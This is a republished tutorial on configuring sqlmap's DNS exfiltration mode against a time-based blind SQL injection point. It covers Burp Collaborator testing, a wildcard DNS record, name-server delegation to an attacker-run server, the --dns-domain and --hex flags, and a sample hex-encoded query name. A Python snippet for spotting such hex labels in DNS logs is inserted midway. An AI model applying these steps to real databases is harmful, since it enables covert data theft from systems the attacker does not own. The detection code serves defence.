
What is the sqlmap DNS injection configuration method

2025-01-18 Update From: SLTechnology News&Howtos

Shulou(Shulou.com)05/31 Report--

This article introduces the sqlmap DNS injection configuration method. The content is detailed; interested readers can use it as a reference, and I hope it is helpful to you.

There are too few articles about sqlmap's DNS injection on the Internet. Most only briefly introduce the --dns-domain parameter, and the relevant hands-on articles are either written vaguely or gloss over the details, leaving me in a fog (mainly because I'm a novice, and the key point is that I have no expert to guide me). So I referred to the methods on the Internet and went through the whole thing myself.

Things to prepare: sqlmap, one blind injection point on a Windows host, two domain names, and a public network server.

When I was in trouble, I came across a time-based blind injection; it happened to be on Windows, and I thought of the DNS injection method.

Before I start, I'm going to test the DNS injection payload with sqlmap's --sql-shell option.

First go to the Collaborator client in Burp Suite and copy the domain name that Burp assigns to us.

Execute the SQL statement using sqlmap.

While sqlmap is still running, the request has already been received in Burp Suite.

352E362E3134.9hreqpopru1xgf9skq473yo14sajy8.burpcollaborator.net.

The 352E362E3134 in it is the result returned after executing version().

The MySQL version is obtained by decoding it. So at this point there is nothing wrong with DNS injection.
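Seen from the defender's side, the query name above is what ends up in resolver logs, and it can be flagged there. The following is an added example (not code from the original article): it scans DNS query names for labels that are hex-encoded printable text. Apart from the name quoted from the article, the sample names are constructed, and treating the last two labels as the registered domain is a simplifying assumption.

```python
import re
import string

# Even-length run of hex digits: 3 to 31 byte pairs fits inside a 63-char DNS label.
HEX_LABEL = re.compile(r"^(?:[0-9A-Fa-f]{2}){3,31}$")
PRINTABLE = set(string.printable) - {"\x0b", "\x0c"}

def decode_hex_label(label):
    """Return the text a label encodes, or None if it is not hex-encoded printable ASCII."""
    if not HEX_LABEL.match(label):
        return None
    text = bytes.fromhex(label).decode("latin-1")
    return text if all(ch in PRINTABLE for ch in text) else None

def flag_hex_queries(qnames):
    """Return (qname, parent_zone, decoded_text) for each name carrying a hex-encoded label."""
    hits = []
    for qname in qnames:
        labels = qname.rstrip(".").split(".")
        # Skip the last two labels (assumed registered domain + TLD; a simplification,
        # production code should consult the public suffix list).
        for i, label in enumerate(labels[:-2]):
            decoded = decode_hex_label(label)
            if decoded is not None:
                hits.append((qname, ".".join(labels[i + 1:]), decoded))
                break
    return hits

# First name is the one shown in the article; the rest are constructed benign samples.
SAMPLE_QNAMES = [
    "352E362E3134.9hreqpopru1xgf9skq473yo14sajy8.burpcollaborator.net.",
    "www.example.com.",
    "deadbeef.cdn.example.net.",   # hex-looking, but does not decode to printable text
    "123456.tracking.example.org.",
]

if __name__ == "__main__":
    for qname, zone, decoded in flag_hex_queries(SAMPLE_QNAMES):
        print(f"ALERT zone={zone} decoded={decoded!r} qname={qname}")
```

Grouping the hits by parent zone and alerting when one zone receives many distinct decodable labels separates this traffic from the occasional hex-looking hostname.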

Prepare and configure two domain names. Some articles on the Internet say that one is enough, but that always feels more troublesome: many domain name service providers do not offer some of the advanced features, so it is easier to prepare two.

www.a.com

www.b.com

First, let's configure domain name A (a.com).

You only need to add a wildcard (*) record that resolves to the IP of our public network server.

Next, configure domain name B (b.com).

This is even easier. Just change the domain's name servers to ns1.a.com and ns2.a.com. You don't have to do anything else.

Then wait for the changes to take effect. Let's test from the public network server to see whether resolution works.

Start listening on port 53 on the server.

Then ping hello.b.com from the local machine. On the public network server we can see that the hello.b.com request has been received, while the local machine reports that the host cannot be found. Don't worry about that, because we haven't set up resolution. Everything is now configured, and we can use sqlmap for DNS injection.

Add the parameters --dns-domain=b.com --hex to sqlmap.

At this step, sqlmap will hang at the prompt about setting up the DNS server instance.

Just press Ctrl+C.

sqlmap then reports that data retrieval through the DNS channel was successful.

Injection is now as fast as error-based and UNION-based injection, and you no longer have to put up with a snail's pace.

That is all for the sqlmap DNS injection configuration method. I hope the above content is of some help and lets you learn something new. If you think the article is good, you can share it so more people can see it.
